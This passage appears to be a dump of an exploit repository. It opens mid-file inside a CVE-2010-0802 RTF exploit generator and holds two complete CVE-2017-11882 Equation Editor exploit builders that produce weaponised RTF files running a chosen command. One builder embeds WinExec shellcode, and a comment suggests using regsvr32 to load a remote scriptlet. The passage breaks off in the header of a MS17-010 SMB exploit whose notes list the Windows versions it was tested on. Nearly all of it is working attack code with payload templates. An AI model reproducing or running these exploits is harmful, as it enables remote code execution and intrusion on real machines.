 75 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 76 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 77 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 78 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 79 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 80 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 81 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 82 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 83 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 84 | ffffff01000002080000000000000000000000000000000000000000000000000000000000000000
 85 | 0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02
 86 | ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e
 87 | 30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000
 88 | 00000000000000000000000000000000000000000000000000000000000000000000000000030004
 89 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 90 | 000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4
 91 | ee5b0000000000030101030a0a01085a5a33c099b202c1e2082be2e8ffffffffc35b50648b40308b
 92 | 400899b203c1e21066ba120c03c28d5b1c53ffe02020202000000000000000000000000000000000
 93 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 94 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 95 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 96 | 00000000000000000000000000000000000000000000000000000000000000000000004500710075
 97 | 006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000
 98 | 0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000
 99 | 0000000000000000000000000000000000000000000000000000000000000004000000c500000000
100 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
101 | 00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff
102 | ffffff00000000000000000000000000000000000000000000000000000000000000000000000000
103 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
104 | 000000000000000000000000000000000000000000000000000000000000000000000000000000ff
105 | ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000
106 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
107 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
108 | 00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000
109 | 00000000000000000000000000000000000000000000000000000001050000050000000d0000004d
110 | 45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500
111 | 000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00
112 | 050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00
113 | ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468
114 | 54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65
115 | 7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001
116 | 90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131
117 | 0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131
118 | 31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000
119 | 0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff
120 | 7cef1800040000002d01010004000000f0010000030000000000
121 | """
122 | 
123 | 
124 | COMMAND_OFFSET = (0x949+0x2b)*2
125 | COMD_LEN = (0x94-0x2b)
126 | 
127 | def create_ole_exec_primitive(command):
128 | 	if len(command) > COMD_LEN:
129 | 		raise ValueError("primitive command must be shorter than 148 bytes")
130 | 	hex_command = command.encode("hex")
131 | 	hex_command += (COMD_LEN - len(command)) * "20"
132 | 	hex_command += "2500"
133 | 
134 | 	objdata_hex_stream = OBJDATA_TEMPLATE.translate(None, "\r\n")
135 | 	ole_data = objdata_hex_stream[:COMMAND_OFFSET] + hex_command + objdata_hex_stream[COMMAND_OFFSET + len(hex_command):]
136 | 	return OBJECT_HEADER + ole_data + OBJECT_TRAILER
137 | 
138 | 
139 | def create_rtf(header, trailer, executable):
140 |     ole = create_ole_exec_primitive("cmd.exe /c " + executable + " #")
141 |     # We need 2 or more commands for executing remote file from WebDAV
142 |     # because WebClient service start may take some time
143 |     return header + ole + trailer
144 | 
145 | 
146 | if __name__ == '__main__':
147 |     parser = argparse.ArgumentParser(description="PoC for CVE-2010-0802")
148 |     parser.add_argument("-e", "--executable", help="Remote executable in WebDAV path", required=True)
149 |     parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
150 | 
151 |     args = parser.parse_args()
152 | 
153 |     rtf_content = create_rtf(RTF_HEADER, RTF_TRAILER,  args.executable)
154 | 
155 |     output_file = open(args.output, "w")
156 |     output_file.write(rtf_content)
157 | 
158 |     print "!!! Completed !!!"
159 | 


--------------------------------------------------------------------------------
/CVE-2017-11882/Command_CVE_2017-11882_109.py:
--------------------------------------------------------------------------------
 1 | # Original poc :https://github.com/embedi/CVE-2017-11882
 2 | # This version accepts a command with 109 bytes long in maximum.
 3 | # Sorry I don't know how to read the struct in objdata, hence I cannot modify the length parameter to aquire a arbitrary length code execution.
 4 | # But that's enough in exploitation. We can use regsvr32 to load sct file remotely.:)
 5 | 
 6 | import argparse
 7 | import sys
 8 | from struct import pack
 9 | 
10 | head=r'''{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
11 | {\*\generator Riched20 6.3.9600}\viewkind4\uc1
12 | \pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020cea5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006f006d0070004f0062006a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004f0062006a0049006e0066006f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201ffffffff04000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000000000000000000000000000000000000000000000000000000000000000000000000000000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
13 | '''
14 | 
15 | tail=r'''
16 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000004000000C5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C4550494354003421000035FEFFFF9201000008003421CB010000010009000003C500000002001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A600190160A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A000000313131313131313131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F0010000030000000000
17 | }{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}}
18 | {\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}}
19 | {\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}}
20 | {\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0
21 | \picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}0100090000035100000000001200000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b02
22 | 00000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}}
23 | \par}
24 | '''
25 | #0:  b8 44 eb 71 12          mov    eax,0x1271eb44
26 | #5:  ba 78 56 34 12          mov    edx,0x12345678
27 | #a:  31 d0                   xor    eax,edx
28 | #c:  8b 08                   mov    ecx,DWORD PTR [eax]
29 | #e:  8b 09                   mov    ecx,DWORD PTR [ecx]
30 | #10: 8b 09                   mov    ecx,DWORD PTR [ecx]
31 | #12: 66 83 c1 3c             add    cx,0x3c
32 | #16: 31 db                   xor    ebx,ebx
33 | #18: 53                      push   ebx
34 | #19: 51                      push   ecx
35 | #1a: be 64 3e 72 12          mov    esi,0x12723e64
36 | #1f: 31 d6                   xor    esi,edx
37 | #21: ff 16                   call   DWORD PTR [esi] // call WinExec
38 | #23: 53                      push   ebx
39 | #24: 66 83 ee 4c             sub    si,0x4c
40 | #28: ff 10                   call   DWORD PTR [eax] // call ExitProcess
41 | stage1="\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10"
42 | 
43 | 
44 | # pads with nop
45 | stage1=stage1.ljust(44,'\x90')
46 | 
47 | def genrtf(cmd):
48 |     if len(cmd) > 109:
49 |         print "[!] Primitive command must be shorter than 109 bytes"
50 |         sys.exit(0)
51 |     payload='\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ'
52 |     payload+=stage1
53 |     payload+=pack('<I',0x00402114) # ret
54 |     payload+='\x00'*2
55 |     payload+=cmd
56 |     payload=payload.ljust(197,'\x00')
57 | 
58 |     return head+payload.encode('hex')+tail
59 | 
60 | 
61 | if __name__ == '__main__':
62 |     parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882")
63 |     parser.add_argument("-c", "--cmd", help="Command run in target system", required=True)
64 |     parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
65 | 
66 |     args = parser.parse_args()
67 | 
68 |     with open(args.output,'wb') as f:
69 |         f.write(genrtf(args.cmd))
70 |         f.close()
71 | 
72 |     print "[*] Done ! output file --> " + args.output
73 | 


--------------------------------------------------------------------------------
/CVE-2017-11882/Command_CVE-2017-11882.py:
--------------------------------------------------------------------------------
  1 | #-*-coding:utf-8-*-
  2 | import argparse
  3 | import sys
  4 | 
  5 | 
  6 | RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
  7 | {\*\generator Riched20 6.3.9600}\viewkind4\uc1
  8 | \pard\sa200\sl276\slmult1\f0\fs22\lang9"""
  9 | 
 10 | 
 11 | RTF_TRAILER = R"""\par}
 12 | """
 13 | 
 14 | 
 15 | OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """
 16 | 
 17 | 
 18 | OBJECT_TRAILER = R"""
 19 | }{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}}
 20 | {\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}}
 21 | {\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}}
 22 | {\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0
 23 | \picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}0100090000035100000000001200000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b02
 24 | 00000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}}
 25 | """
 26 | 
 27 | 
 28 | OBJDATA_TEMPLATE = R"""
 29 | 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1
 30 | b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001
 31 | 0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff
 32 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 33 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 34 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 35 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 36 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 37 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 38 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 39 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 40 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 41 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 42 | fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe
 43 | fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 44 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 45 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 46 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 47 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 48 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 49 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 50 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 51 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 52 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 53 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 54 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 55 | ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000
 56 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 57 | 00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000
 58 | 000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000
 59 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 60 | 00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000
 61 | 0000000000000000000000000000000000000000000000000000001400000000000000010043006f
 62 | 006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000
 63 | 00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000
 64 | 00000000000000000000000000000000000000000000000000000000000000010000006600000000
 65 | 00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000
 66 | 00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff
 67 | ffffff00000000000000000000000000000000000000000000000000000000000000000000000003
 68 | 0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe
 69 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 70 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 71 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 72 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 73 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 74 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 75 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 76 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 77 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 78 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 79 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 80 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 81 | ffffff01000002080000000000000000000000000000000000000000000000000000000000000000
 82 | 0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02
 83 | ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e
 84 | 30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000
 85 | 00000000000000000000000000000000000000000000000000000000000000000000000000030004
 86 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 87 | 000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4
 88 | ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141       # 5a5a + command + AAAAAAA
 89 | 414141414141414141414141414141414141414141120c4300000000000000000000000000000000
 90 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 91 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 92 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 93 | 00000000000000000000000000000000000000000000000000000000000000000000004500710075
 94 | 006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000
 95 | 0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000
 96 | 0000000000000000000000000000000000000000000000000000000000000004000000c500000000
 97 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 98 | 00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff
 99 | ffffff00000000000000000000000000000000000000000000000000000000000000000000000000
100 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
101 | 000000000000000000000000000000000000000000000000000000000000000000000000000000ff
102 | ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000
103 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
104 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
105 | 00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000
106 | 00000000000000000000000000000000000000000000000000000001050000050000000d0000004d
107 | 45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500
108 | 000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00
109 | 050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00
110 | ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468
111 | 54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65
112 | 7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001
113 | 90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131
114 | 0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131
115 | 31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000
116 | 0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff
117 | 7cef1800040000002d01010004000000f0010000030000000000
118 | """
119 | 
120 | 
121 | COMMAND_OFFSET = 0x949*2
122 | 
123 | 
124 | def create_ole_exec_primitive(command):
125 |     if len(command) > 43:        # 命令的长度不能大于43字节
126 |         print "[!] Primitive command must be shorter than 43 bytes"
127 |         sys.exit(0)
128 |     hex_command = command.encode("hex")       # 命令编码为hex
129 |     objdata_hex_stream = OBJDATA_TEMPLATE.translate(None, "\r\n")      # 将OBJDATA_TEMPLATE转换为
130 |     ole_data = objdata_hex_stream[:COMMAND_OFFSET] + hex_command + objdata_hex_stream[COMMAND_OFFSET + len(hex_command):]
131 |     print objdata_hex_stream[:COMMAND_OFFSET]
132 |     return OBJECT_HEADER + ole_data + OBJECT_TRAILER       # 头+OLE_data+尾
133 | 
134 | 
135 | 
136 | def create_rtf(header,command,trailer):
137 |     ole1 = create_ole_exec_primitive(command + " &")
138 | 
139 |     # We need 2 or more commands for executing remote file from WebDAV
140 |     # because WebClient service start may take some time
141 |     return header + ole1 + trailer      # header -> RTF_HEADER     trailer -> RTF_TRAILER
142 | 
143 | 
144 | 
145 | if __name__ == '__main__':
146 |     parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882")
147 |     parser.add_argument("-c", "--command", help="Command to execute.", required=True)
148 |     parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
149 | 
150 |     args = parser.parse_args()
151 | 
152 |     rtf_content = create_rtf(RTF_HEADER, args.command ,RTF_TRAILER)     # 执行的命令
153 | 
154 |     output_file = open(args.output, "w")          # 写出文件名
155 |     output_file.write(rtf_content)
156 | 
157 |     print "[*] Done ! output file --> " + args.output
158 | 


--------------------------------------------------------------------------------
/MS17-010/ms17-010.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | from impacket import smb, smbconnection
  3 | from mysmb import MYSMB
  4 | from struct import pack, unpack, unpack_from
  5 | import sys
  6 | import socket
  7 | import time
  8 |  
  9 | '''
 10 | MS17-010 exploit for Windows 2000 and later by sleepya
 11 |  
 12 | Note:
 13 | - The exploit should never crash a target (chance should be nearly 0%)
 14 | - The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed
 15 |  
 16 | Tested on:
 17 | - Windows 2016 x64
 18 | - Windows 10 Pro Build 10240 x64
 19 | - Windows 2012 R2 x64
 20 | - Windows 8.1 x64
 21 | - Windows 2008 R2 SP1 x64
 22 | - Windows 7 SP1 x64
 23 | - Windows 2008 SP1 x64
 24 | - Windows 2003 R2 SP2 x64
 25 | - Windows XP SP2 x64
 26 | - Windows 8.1 x86
 27 | - Windows 7 SP1 x86
 28 | - Windows 2008 SP1 x86
 29 | - Windows 2003 SP2 x86
 30 | - Windows XP SP3 x86
 31 | - Windows 2000 SP4 x86
 32 | '''
 33 |  
 34 | USERNAME = ''
 35 | PASSWORD = ''
 36 |  
 37 | '''
 38 | A transaction with empty setup:
 39 | - it is allocated from paged pool (same as other transaction types) on Windows 7 and later
 40 | - it is allocated from private heap (RtlAllocateHeap()) with no on use it on Windows Vista and earlier
 41 | - no lookaside or caching method for allocating it
 42 |  
 43 | Note: method name is from NSA eternalromance
 44 |  
 45 | For Windows 7 and later, it is good to use matched pair method (one is large pool and another one is fit
 46 | for freed pool from large pool). Additionally, the exploit does the information leak to check transactions
 47 | alignment before doing OOB write. So this exploit should never crash a target against Windows 7 and later.
 48 |  
 49 | For Windows Vista and earlier, matched pair method is impossible because we cannot allocate transaction size
 50 | smaller than PAGE_SIZE (Windows XP can but large page pool does not split the last page of allocation). But
 51 | a transaction with empty setup is allocated on private heap (it is created by RtlCreateHeap() on initialing server).
 52 | Only this transaction type uses this heap. Normally, no one uses this transaction type. So transactions alignment
 53 | in this private heap should be very easy and very reliable (fish in a barrel in NSA eternalromance). The drawback
 54 | of this method is we cannot do information leak to verify transactions alignment before OOB write.
 55 | So this exploit has a chance to crash target same as NSA eternalromance against Windows Vista and earlier.
 56 | '''
 57 |  
 58 | '''
 59 | Reversed from: SrvAllocateSecurityContext() and SrvImpersonateSecurityContext()
 60 | win7 x64
 61 | struct SrvSecContext {
 62 |     DWORD xx1; // second WORD is size
 63 |     DWORD refCnt;
 64 |     PACCESS_TOKEN Token;  // 0x08
 65 |     DWORD xx2;
 66 |     BOOLEAN CopyOnOpen; // 0x14
 67 |     BOOLEAN EffectiveOnly;
 68 |     WORD xx3;
